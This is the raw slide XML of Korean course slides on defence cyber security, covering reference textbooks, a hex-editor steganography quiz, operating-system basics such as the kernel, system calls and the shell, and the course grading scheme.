                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>주교재</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" b="1" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" b="1" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>사이버전 개론</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>, / </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>양서각</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>/ 3</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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참고교재 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>: 0</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>과 </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>1</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>/ </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>인포더북스</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>/ </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0" spc="0" err="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>손영동</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ko-KR" altLang="en-US" sz="1000"/>
              <a:t>추측되는 파일 헤더 앞 부분까지 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" err="1"/>
              <a:t>블록지정하고</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>편집 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>삭제를 통해 삭제한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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파일 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>– </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>다른 이름으로 저장을 누른 후 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>“known_file.jpg” </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>로 저장한다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="100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7. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>파일을 열어본다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="100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a:t>퀴즈 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>- steganography</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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/Theory/T14 </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>퀴즈 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>- </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>Steganography</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err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>찾으시오</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="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err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>Hxd</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를 이용해보자</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>.</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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t> 를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
                <a:ea typeface="맑은 고딕" panose="020B0503020000020004" pitchFamily="50" charset="-127"/>
              </a:rPr>
              <a:t>이해할 수 있다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000" kern="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>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en-US" altLang="ko-KR" sz="1000" err="1"/>
              <a:t>Hxd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>로 파일을 열어</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>맨 마지막 문자열을 보자</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.</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a:lnSpc>
                <a:spcPct val="140000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>2. 4848484849495548 offset </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>에 어떠한 내용을 숨겼다는 해커</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>그러나 그런 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>offset </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>은 이 파일에 없었다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>문득 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>48 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>은 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>ascii </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>에서 특별하게</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>, 0 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>값을 나타낸다는 사실이 생각났다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>. Ascii </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>문자열로 변환해보자</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3. 00001170 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>으로 변환되었다</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>.  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>이 주소를 따라가보자</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>. Ctrl + G </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>를 누르면</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1000"/>
              <a:t>, offset </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1000"/>
              <a:t>으로 점프할 수 있다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ko-KR" altLang="en-US" sz="100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sz="4400" kern="0" spc="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="함초롬바탕" panose="02030604000101010101" pitchFamily="18" charset="-127"/>
              </a:rPr>
              <a:t>운영체제</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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>컴퓨터기초</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="14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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>(</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1600" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>운영체제</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1600" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>)</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="14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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                          <a:ea typeface="바탕" panose="02030600000101010101" pitchFamily="18" charset="-127"/>
                        </a:rPr>
                        <a:t>• </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1600" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>운영체제</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="16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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>    - </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1600" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>윈도우</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1600" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1600" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>리눅스 운영체제</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1600" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1600" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>파일시스템</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1600" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1600" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>쉘</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="ko-KR" sz="1600" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="ko-KR" altLang="en-US" sz="1600" kern="0" spc="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="휴먼명조"/>
                          <a:ea typeface="휴먼명조"/>
                        </a:rPr>
                        <a:t>시스템 권한</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="14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a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:effectLst/>
                          <a:latin typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                          <a:ea typeface="돋움" panose="020B0600000101010101" pitchFamily="50" charset="-127"/>
                        </a:rPr>
                        <a:t>실습</a:t>
                      </a:r>
                      <a:endParaRPr lang="ko-KR" altLang="en-US" sz="14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운영체제란</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>?</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a:t>프로그래머가 하드웨어를 몰라도 쉽게 하드웨어 자원을 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>쉽게 활용</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>할 수 있게 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>하는것</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>효율적</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>으로 하드웨어 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>( </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" err="1"/>
              <a:t>cpu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>, ram …  )  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>사용하는것</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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Shell</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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a:t>cd Desktop</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400"/>
              <a:t>echo “I ate 5 hamburger“ &gt; ham.txt</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="140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a:t>“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>System Call</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t>"</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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a:t>응용프로그램 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400"/>
              <a:t>사용하기 쉽게 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" err="1"/>
              <a:t>만든것을</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400"/>
              <a:t> 사용하기 쉽게 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" sz="1400" err="1"/>
              <a:t>만든것</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1400"/>
              <a:t>..</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="140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Kernel </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>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a:t>프로그래머가 하드웨어를 몰라도 쉽게 하드웨어 자원을 활용할 수 있게 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1"/>
              <a:t>하는것</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:lnSpc>
                <a:spcPct val="150000"/>
              </a:lnSpc>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>효율적으로 하드웨어를 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>사용하는것</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US">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Process Management</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a:t>“ Process </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Scheduling</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> "</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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a:t>“ Process "</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US"/>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/Plan/Defcybsec</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="ko-KR"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko-KR" altLang="en-US"/>
              <a:t>강의안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국방 사이버 보안</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t>시험</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200"/>
              <a:t>(50%)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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t>실습</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200"/>
              <a:t>(20%)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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t>토의</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200"/>
              <a:t>(10%)</a:t>
            </a:r>
            <a:endParaRPr lang="ko-KR" altLang="en-US" sz="120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t>과제</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="ko-KR" sz="2000"/>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" altLang="ko-KR" sz="1200"/>
              <a:t>(10%)</a:t>
            </a:r>
